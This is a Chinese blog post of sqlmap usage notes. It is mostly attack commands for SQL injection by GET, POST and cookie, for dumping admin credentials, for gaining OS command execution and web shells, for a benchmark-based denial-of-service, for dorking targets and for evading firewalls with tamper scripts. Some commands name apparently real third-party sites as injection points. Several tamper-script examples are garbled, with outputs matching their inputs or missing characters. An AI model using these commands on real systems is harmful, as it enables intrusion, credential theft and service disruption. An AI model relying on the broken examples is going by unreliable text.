• SQL注入工具sqlmap的注入过程记录


    1.sqlmap的get注入

    假设目标是 https://www.baidu.com/news.php?id=1&data=2

    sqlmap语句

    列库

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" --dbs

    //假设结果显示库有3个: test1 、test2、test3

    获取库test1的表

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" -D test1 --tables

    //假设有表3个:admin,user,news

    获取admin表的columns

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" -D test1 -T admin --columns

    //假设有字段3个:id,username,password

    获取id,username,password字段的内容

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" -D test1 -T admin -C "id,usrename,password"

    一切顺利的话 这算是完成了一次注入

    2.sqlmap的post注射

    post肯定要post内容,这个内容一般是表单神马的。可以配合burpsuite,也可以自己手工填写,当然,sqlmap之所以叫做神器,那是因为它自己完全可以搞定

    target还是https://www.baidu.com/news.php

    post的内容是 username=&password=

    可以用sqlmap的随机值,也可以自己随便填下username=admin&password=123

    那么sqlmap语句是:

    列库

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" -data="username=admin&password=123" --dbs

    后续步骤一样

    偷懒不想填post内容可以这样

    sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" --forms

    sqlmap自动获取表单,问你是否填写神马的,然后填不填都可以

    然后用sqlmap虐sqli-labs的话,我记得lessen4和10 要升到level2才可以

    然后是sqlmap的绕过脚本,在最后带上参数 ----tamper "space2morehash.py"

    双引号里面的脚本有哪些,有什么作用请呆着疑问往下看。

    以上手敲的

    下面是 羽翼SQLMAP系列课程笔记

    #######################################################################3

    常用语句

    sqlmap -u https://www.target.com/id=2

    --dbs

    --tables -D whatA

    --columns -D databaseA -T tableA

    --dump -D databaseA -T tableA -C "username,password"

    =============================================================================================

    cookie注入

    注入点:https://www.ntjx.org/jsj/DownloadShow.asp?id=9

    语句sqlmap -u "https://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2

    =============================================================================================

    post注入

    注入点:https://testasp.vulnweb.com/Login.asp

    配合Burpsuite:./sqlmap.py -r search-test.txt -p tfUPass

    ---------------------------------------------------------------------------------------------

    自动获取

    sqlmap -u https://testasp.vulnweb.com/Login.asp --forms

    指定参数

    sqlmap -u https://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"

    =============================================================================================

    交互式写shell需要指定根目录

    ---------------------------------------------------------------------------------------------

    sqlmap -u https://www.target.com/id=2 --os-cmd=ipconfig

    执行ipconfig

    sqlmap -u https://www.target.com/id=2 --os-shell

    获得一个shell即时执行命令,会生成文件 tmpbxbxz.php 和 tmppuoiuz.php

    ---------------------------------------------------------------------------------------------

    伪静态注入点:https://www.target.com/ndex.php/Index/view/id/40.html

    sqlmap -u https://www.target.com/ndex.php/Index/view/id/40*.html --dbs//注意*位置,在有注入的地方,后面你懂的

    =============================================================================================

    请求延时

    注入点:https://sfl.fzu.edu.cn/index.php/Index/view/id/40.html

    参数 --delay --safe-freq

    sqlmap --dbs -u https://www.target.com/ndex.php/Index/view/id/40*.html --delay 0.5//延时0.5秒

    sqlmap --dbs -u https://www.target.com/ndex.php/Index/view/id/40*.html --safe-freq//请求2次

    =============================================================================================

    google关键字找注入点

    sqlmap-g inurl:php?id=1

    =============================================================================================

    sqlmapDDoS攻击

    sqlmap -u https://www.target.com/id=2 --sql-shell

    获得一个即时shell,执行

    select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

    =============================================================================================

    sqlmap绕过WAF防火墙

    注入点:https://www.target.com/id=2

    sqlmap -u https://192.168.159.1/news.php?id=1 -v 3 --dbs--batch --tamper "space2morehash.py"

    tamper文件夹下自行发挥

    =============================================================================================

    sqlmap查看 权限及可执行函数

    sqlmap -u https://www.target.com/id=2 --privileges

    ######################################################################################

    一下是sqlmap的绕过脚本的解释:

    sqlmap自带的绕过脚本,简单翻译了一下,部分可能翻译的不到位,见谅。。

    apostrophemask.py UTF-8编码

    Example:

    * Input: AND '1'='1'

    * Output: AND '1'='1'

    apostrophenullencode.py unicode编码

    Example:

    * Input: AND '1'='1'

    * Output: AND '1'='1'

    appendnullbyte.py 添加

    Example:

    * Input: AND 1=1

    * Output: AND 1=1

    Requirement:

    * Microsoft Access

    base64encode.py base64编码

    Example:

    * Input: 1' AND SLEEP(5)#

    * Output: MScgQU5EIFNMRUVQKDUpIw==

    between.py 以“not between”替换“>”

    Example:

    * Input: 'A > B'

    * Output: 'A NOT BETWEEN 0 AND B'

    bluecoat.py 以随机的空白字符替代空格,以“like”替代“=”

    Example:

    * Input: SELECT id FROM users where id = 1

    * Output: SELECT id FROM users where id LIKE 1

    Requirement:

    * MySQL 5.1, SGOS

    chardoubleencode.py 双重url编码

    Example:

    * Input: SELECT FIELD FROM TABLE

    * Output: SELECT FIELD FROM TABLE

    charencode.py url编码

    Example:

    * Input: SELECT FIELD FROM TABLE

    * Output: SELECT FIELD FROM TABLE

    charunicodeencode.py 对未进行url编码的字符进行unicode编码

    Example:

    * Input: SELECT FIELD FROM TABLE

    * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'

    Requirement:

    * ASP

    * ASP.NET

    equaltolike.py 以“like”替代“=”

    Example:

    * Input: SELECT * FROM users WHERE id=1

    * Output: SELECT * FROM users WHERE id LIKE 1

    halfversionedmorekeywords.py在每个关键字前添加条件注释

    Example:

    * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa

    * Output: value'--

    Requirement:

    * MySQL

    modsecurityzeroversioned.py 条件注释,0000

    Example:

    * Input: 1 AND 2>1--

    * Output: 1 --

    Requirement:

    * MySQL

    multiplespaces.py 添加多个空格

    Example:

    * Input: UNION SELECT

    * Output:UNIONSELECT

    nonrecursivereplacement.py 可以绕过对关键字删除的防注入(这个我也不知道怎么说好,看例子。。。)

    Example:

    * Input: 1 UNION SELECT 2--

    * Output: 1 UNUNIONION SELSELECTECT 2--

    percentage.py 在每个字符前添加百分号(%)

    Example:

    * Input: SELECT FIELD FROM TABLE

    * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

    Requirement:

    * ASP

    randomcase.py 随即大小写

    Example:

    * Input: INSERT

    * Output: InsERt

    randomcomments.py 随机插入区块注释

    Example:

    'INSERT' becomes 'INSERT'

    securesphere.py 语句结尾添加“真”字符串

    Example:

    * Input: AND 1=1

    * Output: AND 1=1 and '0having'='0having'

    sp_password.py 语句结尾添加“sp_password”迷惑数据库日志(很。。。)

    Example: www.2cto.com

    * Input: 1 AND 9227=9227--

    * Output: 1 AND 9227=9227--sp_password

    Requirement:

    * MSSQL

    space2comment.py 以区块注释替换空格

    Example:

    * Input: SELECT id FROM users

    * Output: SELECTidFROMusers

    space2dash.py 以单行注释“--”和随机的新行替换空格

    Example:

    * Input: 1 AND 9227=9227

    * Output: 1--PTTmJopxdWJ AND--cWfcVRPV 9227=9227

    Requirement:

    * MSSQL

    * SQLite

    space2hash.py 以单行注释“#”和由随机字符组成的新行替换空格

    Example:

    * Input: 1 AND 9227=9227

    * Output: 1#PTTmJopxdWJ AND#cWfcVRPV 9227=9227

    Requirement:

    * MySQL

    space2morehash.py 没看出来和上面那个有什么区别。。

    Requirement:

    * MySQL >= 5.1.13

    space2mssqlblank.py 以随机空白字符替换空格

    Example:

    * Input: SELECT id FROM users

    * Output: SELECTidFROMusers

    Requirement:

    * Microsoft SQL Server

    space2mssqlhash.py 以单行注释“#”和新行替换空格

    Example:

    * Input: 1 AND 9227=9227

    * Output: 1# 9227=9227

    Requirement:

    * MSSQL

    * MySQL

    space2mysqlblank.py 以随机空白字符替换空格

    Example:

    * Input: SELECT id FROM users

    * Output: SELECTidFROM?users

    Requirement:

    * MySQL

    space2mysqldash.py 以单行注释和新行替换空格

    Example:

    * Input: 1 AND 9227=9227

    * Output: 1-- AND-- 9227=9227

    Requirement:

    * MySQL

    * MSSQL

    space2plus.py 以“+”替换空格

    Example:

    * Input: SELECT id FROM users

    * Output: SELECT+id+FROM+users

    space2randomblank.py 随机空白字符替换空格

    Example:

    * Input: SELECT id FROM users

    * Output: SELECT id FROM users

    unionalltounion.py 以“union all”替换“union”

    Example:

    * Input: -1 UNION ALL SELECT

    * Output: -1 UNION SELECT

    unmagicquotes.py 以“?'”替换单引号,并在结尾添加注释“--”

    Example:

    * Input: 1' AND 1=1

    * Output: 1?' AND 1=1--

    versionedkeywords.py 对不是函数的关键字条件注释

    Example:

    * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

    * Output: 1,,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()),CHAR(32)),CHAR(58,100,114,117,58))#

    Requirement:

    * MySQL

    versionedmorekeywords.py 对关键字条件注释

    Example:

    * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

    * Output: 1,,((58,122,114,115,58),(CAST(()),(32)),(58,115,114,121,58))#

    Requirement:

    * MySQL >= 5.1.13

    ########################################################################################

    如果web应用使用asp/asp.net开发,charunicodeencode.py和percentage.py可以帮助你逃避Waf的检测。

    有意思的是,asp允许在字符之间使用多个%号间隔,比如 AND 1=%%%%%%%%1 是合法的!

  • 相关阅读:
    Maven pom.xml中添加指定的中央仓库
    命令行远程链接MySQL
    A required class was missing while executing org.apache.maven.plugins:maven-war-plugin:2.1.1:war
    mvn deploy命令上传包
    保存好你的密码
    PuTTY免输密码自动登录Linux
    ActiveMQ无法启动
    linux控制台批量杀进程
    dubbo入门之微服务客户端服务端配置
    dubbo入门之helloWorld
  • 原文地址:https://www.cnblogs.com/zgq123456/p/10165806.html
Copyright © 2020-2023  润新知